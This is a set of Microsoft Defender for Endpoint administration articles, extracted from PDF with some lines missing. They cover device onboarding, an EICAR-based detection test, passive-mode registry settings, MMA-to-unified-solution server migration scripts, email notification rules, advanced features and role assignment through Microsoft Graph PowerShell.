Congratulations! You've completed the Setup phase of migrating to Defender for
Endpoint!
Proceed to Phase 3: Onboard to Defender for Endpoint

 Tip
Feedback

Endpoint - Phase 3: Onboard
Article • 10/24/2023
Applies to:

ﾉ Expand table
You're here!
Welcome to Phase 3 of migrating to Defender for Endpoint. This migration phase

1. Onboard devices to Defender for Endpoint.

2. Run a detection test.
3. Confirm that Microsoft Defender Antivirus is in passive mode on your endpoints.
4. Get updates for Microsoft Defender Antivirus.
5. Uninstall your non-Microsoft solution.
6. Make sure Defender for Endpoint is working correctly.
Step 1: Onboard devices to Microsoft Defender

for Endpoint
2. Choose Settings > Endpoints > Onboarding (under Device management).
3. In the Select operating system to start onboarding process list, select an

operating system.
4. Under Deployment method, select an option. Follow the links and prompts to
onboard your organization's devices. Need help? See Onboarding methods (in this
article).
７ Note
If something goes wrong while onboarding, see Troubleshoot Microsoft Defender

for Endpoint onboarding issues. That article describes how to resolve onboarding
issues and common errors on endpoints.
Onboarding methods
Deployment methods vary, depending on operating system and preferred methods. The
following table lists resources to help you onboard to Defender for Endpoint:
ﾉ Expand table
Operating systems Methods
Windows 10 or later Microsoft Intune or Mobile Device Management
Windows Server 2019 Microsoft Configuration Manager

or later
Group Policy
Windows Server,
version 1803 or later VDI scripts
Windows Server 2016 Local script (up to 10 devices)

or Windows Server The local script method is suitable for a proof of concept but shouldn't
2012 R2[1] be used for production deployment. For a production deployment, we
recommend using Group Policy, Microsoft Configuration Manager, or
Intune.
Windows Server 2008 Microsoft Monitoring Agent (MMA) or Microsoft Defender for Cloud
R2 SP1 The Microsoft Monitoring Agent is now Azure Log Analytics agent. To
learn more, see Log Analytics agent overview.
Windows 8.1 Microsoft Monitoring Agent (MMA)

Enterprise The Microsoft Monitoring Agent is now Azure Log Analytics agent. To
learn more, see Log Analytics agent overview.
Windows 8.1 Pro
Windows 7 SP1 Pro
Windows 7 SP1
Operating systems Methods
Windows servers Integration with Microsoft Defender for Cloud
Linux servers
macOS Local script

Microsoft Intune
JAMF Pro
Linux Server Local script

Puppet
Ansible
Chef

(1) Windows Server 2016 and Windows Server 2012 R2 must be onboarded using the
instructions in Onboard Windows servers.
） Important
The standalone versions of Defender for Endpoint Plan 1 and Plan 2 do not include
server licenses. To onboard servers, you'll need an additional license, such as
Microsoft Defender for Servers Plan 1 or Plan 2. To learn more, see Defender for
Step 2: Run a detection test

To verify that your onboarded devices are properly connected to Defender for Endpoint,
you can run a detection test.
ﾉ Expand table
Operating system Guidance
Windows 10 or later See Run a detection test.
Windows Server
2022
Operating system Guidance
Windows Server
2019
Windows Server,
version 1803, or
later
Windows Server
2016
Windows Server
2012 R2
macOS (see System Download and use the DIY app at https://aka.ms/mdatpmacosdiy .
requirements
For more information, see Defender for Endpoint on macOS.
Linux (see System 1. Run the following command, and look for a result of 1: mdatp health --
requirements) field real_time_protection_enabled .
2. Open a Terminal window, and run the following command: curl -o

~/Downloads/eicar.com.txt
https://www.eicar.org/download/eicar.com.txt .
3. Run the following command to list any detected threats: mdatp threat
list .
For more information, see Defender for Endpoint on Linux.
Step 3: Confirm that Microsoft Defender

Antivirus is in passive mode on your endpoints
Now that your endpoints have been onboarded to Defender for Endpoint, your next
step is to make sure Microsoft Defender Antivirus is running in passive mode by using
PowerShell.
1. On a Windows device, open Windows PowerShell as an administrator.
2. Run the following PowerShell cmdlet: Get-MpComputerStatus|select AMRunningMode .
3. Review the results. You should see Passive mode.
７ Note
To learn more about passive mode and active mode, see More details about
Microsoft Defender Antivirus states.
Set Microsoft Defender Antivirus on Windows Server to

passive mode manually
To set Microsoft Defender Antivirus to passive mode on Windows Server, version 1803
or newer, or Windows Server 2019, or Windows Server 2022, follow these steps:
1. Open Registry Editor, and then navigate to

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced
Threat Protection .
2. Edit (or create) a DWORD entry called ForceDefenderPassiveMode, and specify the
following settings:
Set the DWORD's value to 1.

Under Base, select Hexadecimal.
７ Note
You can use other methods to set the registry key, such as the following:
Group Policy Preference

Local Group Policy Object tool
A package in Configuration Manager
Start Microsoft Defender Antivirus on Windows Server

2016
If you're using Windows Server 2016, you might have to start Microsoft Defender
Antivirus manually. You can perform this task by using the PowerShell cmdlet
mpcmdrun.exe -wdenable on the device.
Step 4: Get updates for Microsoft Defender

Antivirus
Keeping Microsoft Defender Antivirus up to date is critical to assure your devices have
the latest technology and features needed to protect against new malware and attack
techniques, even if Microsoft Defender Antivirus is running in passive mode. (See
Microsoft Defender Antivirus compatibility.)
There are two types of updates related to keeping Microsoft Defender Antivirus up to
date:
Security intelligence updates
Product updates
To get your updates, follow the guidance in Manage Microsoft Defender Antivirus
updates and apply baselines.
Step 5: Uninstall your non-Microsoft solution

If, at this point you have onboarded your organization's devices to Defender for
Endpoint, and Microsoft Defender Antivirus is installed and enabled, then your next step
is to uninstall your non-Microsoft antivirus, antimalware, and endpoint protection
solution. When you uninstall your non-Microsoft solution, Microsoft Defender Antivirus
changes from passive mode to active mode. In most cases, this happens automatically.
） Important
If, for some reason, Microsoft Defender Antivirus does not go into active mode
after you have uninstalled your non-Microsoft antivirus/antimalware solution, see
Microsoft Defender Antivirus seems to be stuck in passive mode.
To get help with uninstalling your non-Microsoft solution, contact their technical
support team.
Step 6: Make sure Defender for Endpoint is

working correctly
Now that you have onboarded to Defender for Endpoint, and you have uninstalled your
former non-Microsoft solution, your next step is to make sure that Defender for
Endpoint working correctly.
2. In the navigation pane, choose Endpoints > Device inventory. There, you're able
to see protection status for devices.
To learn more, see Device inventory.
Next step
Congratulations! You have completed your migration to Defender for Endpoint!
Configure your Defender for Endpoint settings.
 Tip
Feedback

Server migration scenarios from the
previous, MMA-based Microsoft
Defender for Endpoint solution
Article • 11/15/2023
Applies to:

Windows Server 2016
７ Note
Always ensure the operating system, and Microsoft Defender Antivirus on Windows
Server 2016, are fully updated before proceeding with installation or upgrade. To
receive regular product improvements and fixes for the EDR Sensor component,
ensure Windows Update KB5005292 gets applied or approved after installation.
In addition, to keep protection components updated, please reference Manage
Microsoft Defender Antivirus updates and apply baselines.
These instructions apply to the new unified solution and installer (MSI) package of
Microsoft Defender for Endpoint for Windows Server 2012 R2 and Windows Server
2016. This article contains high-level instructions for various possible migration
scenarios from the previous to the current solution. These high-level steps are intended
as guidelines to be adjusted to the deployment and configuration tools available in your
environment.
If you are using Microsoft Defender for Cloud to perform deployment, you can
automate installation and upgrade. See Defender for Servers Plan 2 now integrates
with MDE unified solution
７ Note
Operating system upgrades with Microsoft Defender for Endpoint installed are not
supported. Please offboard and uninstall, upgrade the operating system, then
proceed with installation.
Installer script
７ Note
Make sure the machines you run the script on is not blocking the execution of the
script. The recommended execution policy setting for PowerShell is Allsigned. This
requires importing the script's signing certificate into the Local Computer Trusted
Publishers store if the script is running as SYSTEM on the endpoint.
To facilitate upgrades when Microsoft Endpoint Configuration Manager is not yet

available or updated to perform the automated upgrade, you can use this upgrade
script . Download it by selection the "Code" button and downloading the .zip file, then
extracting install.ps1. It can help automate the following required steps:
1. Remove the OMS workspace for Microsoft Defender for Endpoint (OPTIONAL).
2. Remove System Center Endpoint Protection (SCEP) client if installed.
3. Download and install prerequisites if required.
4. Enable and update the Defender Antivirus feature on Windows Server 2016
5. Install Microsoft Defender for Endpoint.
6. Apply the onboarding script for use with Group Policy downloaded from
Microsoft Defender XDR .
To use the script, download it to an installation directory where you have also placed the
installation and onboarding packages (see Configure server endpoints).
EXAMPLE: .\install.ps1 -RemoveMMA <YOUR_WORKSPACE_ID> -OnboardingScript

".\WindowsDefenderATPOnboardingScript.cmd"
For more information on how to use the script, use the PowerShell command "get-help
.\install.ps1".

migration scenarios
７ Note
You'll need Microsoft Endpoint Configuration Manager, version 2107 or later to

perform Endpoint Protection policy configuration. From version 2207 or later
deployment and upgrades can be fully automated.
For instructions on how to migrate using Microsoft Endpoint Configuration Manager
older than version 2207 please see Migrating servers from Microsoft Monitoring Agent
to the unified solution.
If you are running a non-Microsoft antivirus

solution
1. Fully update the machine including Microsoft Defender Antivirus (Windows Server
2016) ensuring prerequisites have been met. For more information on the
prerequisites that have to be met, see Prerequisites for Windows Server 2016.
2. Ensure third-party antivirus management no longer pushes antivirus agents to
these machines.*
3. Author your policies for the protection capabilities in Microsoft Defender for
Endpoint and target those to the machine in the tool of your choice.
4. Install the Microsoft Defender for Endpoint for Windows Server 2012 R2 and 2016
package and enable passive mode. See Install Microsoft Defender Antivirus using
command line. a. Apply the onboarding script for use with Group Policy
downloaded from Microsoft Defender XDR .
5. Apply updates.
6. Remove your non-Microsoft antivirus software by either using the non-Microsoft
antivirus console or by using Microsoft Endpoint Configuration Manager as
appropriate. Make sure to remove passive mode configuration.*
 Tip
You can use the [installer-script](server-migration.md#installer script) as part of

your application to automate the above steps. To enable passive mode, apply the -
Passive flag. For example, .\install.ps1 -RemoveMMA <YOUR_WORKSPACE_ID> -
OnboardingScript ".\WindowsDefenderATPOnboardingScript.cmd" -Passive
*These steps only apply if you intend to replace your non-Microsoft antivirus solution.
See Better together: Microsoft Defender Antivirus and Microsoft Defender for Endpoint.
To move a machine out of passive mode, set the following key to 0:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection Name:

ForceDefenderPassiveMode Type: REG_DWORD Value: 0
If you are running System Center Endpoint
Protection but are not managing the machine
using Microsoft Endpoint Configuration
Manager (MECM/ConfigMgr)
1. Fully update the machine including Microsoft Defender Antivirus (Windows Server
2016) ensuring prerequisites have been met.
2. Create and apply policies using Group Policy, PowerShell, or a 3rd party
management solution.
3. Uninstall System Center Endpoint Protection (Windows Server 2012 R2).
4. Install Microsoft Defender for Endpoint (see Configure server endpoints.)
5. Apply the onboarding script for use with Group Policy downloaded from
Microsoft Defender XDR .
6. Apply updates.
 Tip
You can use the installer script to automate the above steps.
Microsoft Defender for Cloud scenarios
You're using Microsoft Defender for Cloud. The Microsoft

Monitoring Agent (MMA) and/or Microsoft Antimalware
for Azure (SCEP) are installed and you want to upgrade.
If you're using Microsoft Defender for Cloud, you can leverage the automated upgrade
process. See Protect your endpoints with Defender for Cloud's integrated EDR solution:
Group Policy configuration

For configuration using Group Policy, ensure you're using the latest ADMX files in your
central store to access the correct Defender for Endpoint policy options. Please
reference How to create and manage the Central Store for Group Policy Administrative
Templates in Windows and download the latest files for use with Windows 10.
 Tip
Feedback

Migrating servers from Microsoft
Monitoring Agent to the unified
solution
Article • 11/15/2023
Applies to:

Windows Server 2016
This article guides you in migrating down-level servers from Microsoft Monitoring Agent
(MMA) to the unified solution.
Prerequisites
Microsoft Endpoint Configuration Manager (MECM) higher than 2207.
Down-level OS devices in your environment onboarded with Microsoft Monitoring
Agent. To confirm, verify that MsSenseS.exe is running in Task Manager.
Presence of the MMA agent. You can verify it by checking if the correct Workspace
ID is present in the Control Panel> Microsoft Monitoring Agent.
Active Microsoft Defender portal with devices onboarded.
A Device Collection containing down-level servers such as Windows Server 2012
R2 or Windows Server 2016 using MMA agent is set up in your MECM instance.
For more information on installing the listed prerequisites, see related topics section.
Gather required files

Copy the unified solution package, onboarding script and migration script to the same
content source you deploy other apps with MECM.
1. Download Onboarding Script and the unified solution from Microsoft Defender
XDR settings page .

７ Note
You must select the Group Policy from the Deployment method dropdown to
obtain the .cmd file.
2. Download the migration script from the document: Server migration scenarios
from the previous, MMA-based Microsoft Defender for Endpoint solution. This
script can also be found on GitHub: GitHub - microsoft/mdefordownlevelserver .
3. Save all three files in a shared folder used by MECM as a Software Source.
Create the package as an application

1. In the MECM console, follow these steps: Software Library>Applications>Create
Application.
2. Select Manually specify the application information.
3. Select Next on the Software Center screen of the wizard.
4. On the Deployment Types, click Add.
5. Select Manually to specify the deployment type information and select Next.
6. Give a name to your script deployment and select Next.

7. On this step, copy the UNC path that your content is located. Example:
\\ServerName\h$\SOFTWARE_SOURCE\path .
8. Additionally, set the following as the installation program:
PowerShell
Powershell.exe -ExecutionPolicy ByPass -File install.ps1 -RemoveMMA

<workspace ID> -OnboardingScript
.\WindowsDefenderATPOnboardingScript.cmd
Click Next and make sure to add your own Workspace ID in this section.
9. Click Next and click add a clause.
10. The detection method will be based on the registry key shown below.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense
Check the option: This registry setting must exit on the target system to indicate
presence of this application.
 Tip
The registry key value was obtained by running the Powershell command
shown below on a device that has the unified solution installed. Other creative
methods of detection can also be used. The goal is to identify whether the
unified solution has already been installed on a specific device. You can leave
the Value and Data Type fields as blank.
PowerShell
get-wmiobject Win32_Product | Sort-Object -Property Name |Format-Table

IdentifyingNumber, Name, LocalPackage -AutoSize
11. In the User Experience section, check the recommended settings shown in the
screenshot. You can choose what suits your environment and click Next. For
Installation program visibility, it's advisable to install with Normal during phase
testing then change it to Minimized for general deployment.
 Tip
The maximum allowed runtime can be lowered from (default) 120 minutes to
60 minutes.
12. Add any additional requirements then select Next.
13. Under the Dependencies section, select Next.
14. Select Next until completion screen comes up, then Close.
15. Keep select Next until the completion of Application Wizard. Verify all have been
green checked.
16. Close the wizard, right-click on the recently created application and deploy it to
your down-level-server collection. Locally, the installation can be confirmed at
Software Center. For details, check the CM logs at
C:\Windows\CCM\Logs\AppEnforce.log .

17. Verify the status of the migration at MECM > Monitoring > Deployments.
18. Troubleshooting .ETL files will be created and automatically saved locally in each
server at this location C:\Windows\ccmcache\#\ . These files can be leveraged by
support to troubleshoot onboarding issues.
Related topics
Microsoft Monitoring Agent Setup
Deploy applications - Configuration Manager
Microsoft Defender for Endpoint - Configuration Manager
Onboard Windows servers to the Microsoft Defender for Endpoint service
Microsoft Defender for Endpoint: Defending Windows Server 2012 R2 and 2016
 Tip
Feedback

Configure general Defender for
Endpoint settings
Article • 01/19/2024
Applies to:

Use the Settings > Endpoints menu to modify general settings, advanced features,
enable the preview experience, email notifications, and the custom threat intelligence
feature.
In this section
ﾉ Expand table
Topic Description
General settings Modify your general settings that were previously defined as part of the
onboarding process.
Permissions Manage portal access using RBAC as well as device groups.
APIs Enable the threat intel and SIEM integration.
Rules Configure suppressions rules and automation settings.
Device Onboard and offboard devices.

management
Network Choose devices to be scanned regularly and added to the device inventory.
assessments
 Tip
Feedback

Configure alert notifications in
Article • 07/13/2023
Applies to:

You can configure Microsoft Defender XDR to send email notifications to specified
recipients for new alerts. This feature enables you to identify a group of individuals who
will immediately be informed and can act on alerts based on their severity.
If you're using Defender for Business, you can set up email notifications for specific
users (not roles or groups).
７ Note
Only users with 'Manage security settings' permissions can configure email
notifications. If you've chosen to use basic permissions management, users
with Security Administrator or Global Administrator roles can configure email
notifications.
2.
You can set the alert severity levels that trigger notifications. You can also add or remove
recipients of the email notification. New recipients get notified about alerts triggered
after they're added. For more information about alerts, see View and organize the Alerts
queue.
If you're using role-based access control (RBAC), recipients will only receive notifications
based on the device groups that were configured in the notification rule. Users with the
proper permission can only create, edit, or delete notifications that are limited to their
device group management scope. Only users assigned to the Global administrator role
can manage notification rules that are configured for all device groups.
The email notification includes basic information about the alert and a link to the portal
where you can do further investigation.
Create rules for alert notifications
You can create rules that determine the devices and alert severities to send email
notifications for and the notification recipients.
1. Go to Microsoft Defender XDR and sign in using an account with the Security
administrator or Global administrator role assigned.
2. In the navigation pane, select Settings > Endpoints > General > Email
notifications.
3. Click Add item.
4. Specify the General information:
Rule name - Specify a name for the notification rule.
Include organization name - Specify the customer name that appears on the
email notification.
Include tenant-specific portal link - Adds a link with the tenant ID to allow
access to a specific tenant.
Include device information - Includes the device name in the email alert
body.
７ Note
This information might be processed by recipient mail servers that are

not in the geographic location you have selected for your Defender data.
Devices - Choose whether to notify recipients for alerts on all devices (Global
administrator role only) or on selected device groups. For more information,
see Create and manage device groups. (If you're using Defender for Business,
device groups do not apply.)
Alert severity - Choose the alert severity level.
5. Click Next.
6. Enter the recipient's email address then click Add recipient. You can add multiple
email addresses.
7. Check that email recipients can receive the email notifications by selecting Send
test email.
8. Click Save notification rule.
Edit a notification rule

1. Select the notification rule you'd like to edit.
2. Update the General and Recipient tab information.
3. Click Save notification rule.
Delete notification rule

1. Select the notification rule you'd like to delete.
2. Click Delete.
Troubleshoot email notifications for alerts

This section lists various issues that you may encounter when using email notifications
for alerts.
Problem: Intended recipients report they're not getting the notifications.
Solution: Make sure that the notifications aren't blocked by email filters:
1. Check that the email notifications aren't sent to the Junk Email folder. Mark them
as Not junk.
2. Check that your email security product isn't blocking the email notifications.
3. Check your email application rules that might be catching and moving your email
notifications.
Related topics
Update data retention settings
Configure advanced features
Configure vulnerability email notifications
 Tip
Tech Community: Microsoft Defender XDR Tech Community .
Feedback

Configure vulnerability email
notifications in Microsoft Defender for
Endpoint
Article • 07/18/2023
Applies to:

Configure Microsoft Defender for Endpoint to send email notifications to specified

recipients for new vulnerability events. This feature enables you to identify a group of
individuals who will immediately be informed and can act on the notifications based on
the event. The vulnerability information comes from Microsoft Defender Vulnerability
Management.
If you're using Defender for Business, you can set up vulnerability notifications for
specific users (not roles or groups).
７ Note
Only users with 'Manage security settings' permissions can configure email
notifications. If you've chosen to use basic permissions management, users
with Security Administrator or Global Administrator roles can configure email
notifications. Learn more about permission options
2.
The notification rules allow you to set the vulnerability events that trigger notifications,
and add or remove email notification recipients. New recipients get notified about
vulnerabilities after they're added.
If you're using role-based access control (RBAC), recipients will only receive notifications
based on the device groups that were configured in the notification rule. Users with the
proper permission can only create, edit, or delete notifications that are limited to their
device group management scope. Only users assigned to the Global administrator role
can manage notification rules that are configured for all device groups.
The email notification includes basic information about the vulnerability event. There are
also links to filtered views in the Defender Vulnerability Management Security
recommendations and Weaknesses pages in the portal so you can further investigate.
For example, you could get a list of all exposed devices or get additional details about
the vulnerability.
Create rules for alert notifications

Create a notification rule to send an email when there are certain exploit or vulnerability
events, such as a new public exploit. For each rule, multiple event types can be selected.
1. Go to Microsoft Defender XDR and sign in using an account with the Security
2. In the navigation pane, go to Settings > Endpoints > Email notifications >
Vulnerabilities.
3. Select Add notification rule.
4. Name the email notification rule and include a description.
5. Check Activate notification rule. Select Next
6. Fill in the notification settings. Then select Next
If you're using Defender for Endpoint, choose device groups to get

notifications for. (If you're using Defender for Business, device groups don't
apply.)
Choose the vulnerability event(s) that you want to be notified about when
they affect your organization:
New vulnerability found (including severity threshold)
７ Note
This includes newly detected zero-day vulnerabilities and patches

released for existing zero-day vulnerabilities. For more information,
see patching zero-day vulnerabilities.
Exploit was verified
New public exploit
Exploit added to an exploit kit
Include organization name if you want the organization name in the email.
7. Enter the recipient email address then select Add. You can add multiple email
addresses.
8. Review the settings for the new email notification rule and select Create rule when
you're ready to create it.
Edit a notification rule

1. Select the notification rule you'd like to edit.
2. Select the Edit rule button next to the pencil icon in the flyout. Make sure you have
permission to edit or delete the rule.
Delete notification rule

1. Select the notification rule you'd like to delete.
2. Select the Delete button next to the trash can icon in the flyout. Make sure you
have permission to edit or delete the rule.
Troubleshoot email notifications for alerts

This section lists various issues that you may encounter when using email notifications
for alerts.
Problem: Intended recipients report they aren't getting the notifications.
Solution: Make sure that the notifications aren't blocked by email filters:
1. Check that the Defender for Endpoint email notifications aren't sent to the Junk
Email folder. Mark them as Not junk.
2. Check that your email security product isn't blocking the email notifications from
3. Check your email application rules that might be catching and moving your
Defender for Endpoint email notifications.
Related articles
Defender Vulnerability Management overview
Security recommendations
Weaknesses
Event timeline
 Tip
Feedback

Configure advanced features in
Article • 08/15/2023
Applies to:

Depending on the Microsoft security products that you use, some advanced features
might be available for you to integrate Defender for Endpoint with.
Enable advanced features

1. Log in to Microsoft Defender XDR using an account with the Security
2. In the navigation pane, select Settings > Endpoints > Advanced features.
3. Select the advanced feature you want to configure and toggle the setting between
On and Off.
4. Select Save preferences.
Use the following advanced features to get better protected from potentially malicious
files and gain better insight during security investigations.
Live response
Turn on this feature so that users with the appropriate permissions can start a live
response session on devices.
For more information about role assignments, see Create and manage roles.
Live response for servers

Turn on this feature so that users with the appropriate permissions can start a live
response session on servers.
For more information about role assignments, see Create and manage roles.
Live response unsigned script execution

Enabling this feature allows you to run unsigned scripts in a live response session.
Always remediate PUA

Potentially unwanted applications (PUA) are a category of software that can cause your
machine to run slowly, display unexpected ads, or at worst, install other software, which
might be unexpected or unwanted.
Turn on this feature so that potentially unwanted applications (PUA) are remediated on
all devices in your tenant even if PUA protection isn't configured on the devices. This
activation of the feature helps to protect users from inadvertently installing unwanted
applications on their device. When turned off, remediation is dependent on the device
configuration.
Restrict correlation to within scoped device

groups
This configuration can be used for scenarios where local SOC operations would like to
limit alert correlations only to device groups that they can access. By turning on this
setting, an incident composed of alerts that cross-device groups will no longer be
considered a single incident. The local SOC can then take action on the incident because
they have access to one of the device groups involved. However, global SOC will see
several different incidents by device group instead of one incident. We don't
recommend turning on this setting unless doing so outweighs the benefits of incident
correlation across the entire organization.
７ Note
Changing this setting impacts future alert correlations only.
2.
Enable EDR in block mode

Endpoint detection and response (EDR) in block mode provides protection from
malicious artifacts, even when Microsoft Defender Antivirus is running in passive mode.
When turned on, EDR in block mode blocks malicious artifacts or behaviors that are
detected on a device. EDR in block mode works behind the scenes to remediate
malicious artifacts that are detected post breach.
Autoresolve remediated alerts

For tenants created on or after Windows 10, version 1809, the automated investigation,
and remediation capability is configured by default to resolve alerts where the
automated analysis result status is "No threats found" or "Remediated". If you don't
want to have alerts auto resolved, you'll need to manually turn off the feature.
 Tip
For tenants created prior to that version, you'll need to manually turn this feature
on from the Advanced features page.
７ Note
The result of the auto-resolve action may influence the Device risk level
calculation which is based on the active alerts found on a device.
If a security operations analyst manually sets the status of an alert to "In
progress" or "Resolved" the auto-resolve capability will not overwrite it.
Allow or block file

Blocking is only available if your organization fulfills these requirements:
Uses Microsoft Defender Antivirus as the active antimalware solution and,

The cloud-based protection feature is enabled
This feature enables you to block potentially malicious files in your network. Blocking a
file will prevent it from being read, written, or executed on devices in your organization.
To turn Allow or block files on:
1. In the navigation pane, select Settings > Endpoints > General > Advanced
features > Allow or block file.
2. Toggle the setting between On and Off.
3. Select Save preferences at the bottom of the page.
After turning on this feature, you can block files via the Add Indicator tab on a file's
profile page.
Hide potential duplicate device records

By enabling this feature, you can ensure that you're seeing the most accurate
information about your devices by hiding potential duplicate device records. There are
different reasons duplicate device records might occur, for example, the device
discovery capability in Microsoft Defender for Endpoint might scan your network and
discover a device that's already onboarded or has recently been offboarded.
This feature will identify potential duplicate devices based on their hostname and last
seen time. The duplicate devices will be hidden from multiple experiences in the portal,
such as, the Device Inventory, Microsoft Defender Vulnerability Management pages, and
Public APIs for machine data, leaving the most accurate device record visible. However,
the duplicates will still be visible in global search, advanced hunting, alerts, and incidents
pages.
This setting is turned on by default and is applied tenant wide. If you don't want to hide
potential duplicate device records, you'll need to manually turn off the feature.
Custom network indicators

Turning on this feature allows you to create indicators for IP addresses, domains, or
URLs, which determine whether they'll be allowed or blocked based on your custom
indicator list.
To use this feature, devices must be running Windows 10 version 1709 or later, or
Windows 11. They should also have network protection in block mode and version
4.18.1906.3 or later of the antimalware platform see KB 4052623 .
For more information, see Manage indicators.
７ Note
Network protection leverages reputation services that process requests in locations

that might be outside of the location you've selected for your Defender for
Endpoint data.
Tamper protection
During some kinds of cyber attacks, bad actors try to disable security features, such as
antivirus protection, on your machines. Bad actors like to disable your security features
to get easier access to your data, to install malware, or to otherwise exploit your data,
identity, and devices. Tamper protection essentially locks Microsoft Defender Antivirus
and prevents your security settings from being changed through apps and methods.
For more information, including how to configure tamper protection, see Protect
security settings with tamper protection.
Show user details

Turn on this feature so that you can see user details stored in Microsoft Entra ID. Details
include a user's picture, name, title, and department information when investigating user
account entities. You can find user account information in the following views:
Alert queue
Device details page
For more information, see Investigate a user account.
Skype for Business integration

Enabling the Skype for Business integration gives you the ability to communicate with
users using Skype for Business, email, or phone. This activation can be handy when you
need to communicate with the user and mitigate risks.
７ Note
When a device is being isolated from the network, there's a pop-up where you can
choose to enable Outlook and Skype communications which allows
communications to the user while they are disconnected from the network. This
setting applies to Skype and Outlook communication when devices are in isolation
mode.
Office 365 Threat Intelligence connection
） Important
This setting was used when Microsoft Defender for Office 365 and Microsoft
Defender for Endpoint were in different portals previously. After the convergence of
security experiences into a unified portal that is now called Microsoft Defender
XDR, these settings are irrelevant and don't have any functionality associated with
them. You can safely ignore the status of the control until it is removed from the
portal.
This feature is only available if you have an active subscription for Office 365 E5 or the
Threat Intelligence add-on. For more information, see the Office 365 E5 product page .
This feature enables you to incorporate data from Microsoft Defender for Office 365
into Microsoft Defender XDR to conduct a comprehensive security investigation across
Office 365 mailboxes and Windows devices.
７ Note
You'll need to have the appropriate license to enable this feature.
To receive contextual device integration in Office 365 Threat Intelligence, you'll need to
enable the Defender for Endpoint settings in the Security & Compliance dashboard. For
more information, see Threat investigation and response.
Endpoint Attack Notifications
Endpoint Attack Notifications enable Microsoft to actively hunt for critical threats to be
prioritized based on urgency and impact over your endpoint data.
For proactive hunting across the full scope of Microsoft Defender XDR, including threats
that span email, collaboration, identity, cloud applications, and endpoints, learn more
about Microsoft Defender Experts.

Enabling this setting forwards Defender for Endpoint signals to Microsoft Defender for
Cloud Apps to provide deeper visibility into cloud application usage. Forwarded data is
stored and processed in the same location as your Defender for Cloud Apps data.
７ Note
This feature will be available with an E5 license for Enterprise Mobility + Security
on devices running Windows 10, version 1709 (OS Build 16299.1085 with
KB4493441 ), Windows 10, version 1803 (OS Build 17134.704 with KB4493464 ),
Windows 10, version 1809 (OS Build 17763.379 with KB4489899 ), later Windows
10 versions, or Windows 11.
Enable the Microsoft Defender for Endpoint integration

from the Microsoft Defender for Identity portal
To receive contextual device integration in Microsoft Defender for Identity, you'll also
need to enable the feature in the Microsoft Defender for Identity portal.
1. Sign in to the Microsoft Defender for Identity portal with a Global Administrator
or Security Administrator role.
2. Select Create your instance.
3. Toggle the Integration setting to On and select Save.
After completing the integration steps on both portals, you'll be able to see relevant
alerts in the device details or user details page.
Web content filtering

Block access to websites containing unwanted content and track web activity across all
domains. To specify the web content categories you want to block, create a web content
filtering policy . Ensure you've network protection in block mode when deploying the
Microsoft Defender for Endpoint security baseline .
Share endpoint alerts with Microsoft Purview

compliance portal
Forwards endpoint security alerts and their triage status to Microsoft Purview
compliance portal, allowing you to enhance insider risk management policies with alerts
and remediate internal risks before they cause harm. Forwarded data is processed and
stored in the same location as your Office 365 data.
After configuring the Security policy violation indicators in the insider risk management
settings, Defender for Endpoint alerts will be shared with insider risk management for
applicable users.
Authenticated telemetry
You can Turn on Authenticated telemetry to prevent spoofing telemetry into your
dashboard.
Microsoft Intune connection

Defender for Endpoint can be integrated with Microsoft Intune to enable device risk-
based conditional access. When you turn on this feature, you'll be able to share
Defender for Endpoint device information with Intune, enhancing policy enforcement.
） Important
You'll need to enable the integration on both Intune and Defender for Endpoint to
use this feature. For more information on specific steps, see Configure Conditional
Access in Defender for Endpoint.
This feature is only available if you've the following prerequisites:
A licensed tenant for Enterprise Mobility + Security E3, and Windows E5 (or
Microsoft 365 Enterprise E5)
An active Microsoft Intune environment, with Intune-managed Windows devices
Microsoft Entra joined.
Conditional Access policy
When you enable Intune integration, Intune will automatically create a classic
Conditional Access (CA) policy. This classic CA policy is a prerequisite for setting up
status reports to Intune. It shouldn't be deleted.
７ Note
The classic CA policy created by Intune is distinct from modern Conditional Access
policies, which are used for configuring endpoints.
Device discovery
Helps you find unmanaged devices connected to your corporate network without the
need for extra appliances or cumbersome process changes. Using onboarded devices,
you can find unmanaged devices in your network and assess vulnerabilities and risks.
For more information, see Device discovery.
７ Note
You can always apply filters to exclude unmanaged devices from the device
inventory list. You can also use the onboarding status column on API queries to
filter out unmanaged devices.
Preview features
Learn about new features in the Defender for Endpoint preview release. Try upcoming
features by turning on the preview experience.
You'll have access to upcoming features, which you can provide feedback on to help
improve the overall experience before features are generally available.
Download quarantined files

Backup quarantined files in a secure and compliant location so they can be downloaded
directly from quarantine. The Download file button will always be available in the file
page. This setting is turned on by default. Learn more about requirements
Streamlined connectivity during device
onboarding (Preview)
This setting will set the default onboarding package to 'streamlined' for applicable
operating systems.
You will still have the option to use the standard onboarding package within the
onboarding page but you will need to specifically select it in the drop-down.
Related topics
Update data retention settings
Configure alert notifications
 Tip
Feedback

Use basic permissions to access the
portal
Article • 02/21/2024
Applies to:
Microsoft Entra ID
Refer to the instructions below to use basic permissions management.
You can use either of the following solutions:
Microsoft Graph PowerShell

Azure portal
For granular control over permissions, switch to role-based access control.
Assign user access using Microsoft Graph

PowerShell
You can assign users with one of the following levels of permissions:
Full access (Read and Write)

Read-only access
Before you begin

Install Microsoft Graph PowerShell. For more information, see, How to install
Microsoft Graph PowerShell.
７ Note
You need to run the PowerShell cmdlets in an elevated command-line.
Connect to your Microsoft Entra ID. For more information, see Connect-MgGraph.
Full access: Users with full access can log in, view all system information and
resolve alerts, submit files for deep analysis, and download the onboarding
package. Assigning full access rights requires adding the users to the "Security
Administrator" or "Global Administrator" Microsoft Entra built-in roles.
Read-only access: Users with read-only access can log in, view all alerts, and
related information.
They will not be able to change alert states, submit files for deep analysis or
perform any state changing operations.
Assigning read-only access rights requires adding the users to the "Security
Reader" Microsoft Entra built-in role.
Use the following steps to assign security roles:
For read and write access, assign users to the security administrator role by using
the following command:
PowerShell
$Role = Get-MgDirectoryRole -Filter "DisplayName eq 'Security

Administrator'"
$UserId = (Get-MgUser -UserId "secadmin@Contoso.onmicrosoft.com").Id
$DirObject = @{
"@odata.id" =
"https://graph.microsoft.com/v1.0/directoryObjects/$UserId"
}
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $Role.Id -BodyParameter

$DirObject
For read-only access, assign users to the security reader role by using the
following command:
PowerShell
$Role = Get-MgDirectoryRole -Filter "DisplayName eq 'Security Reader'"

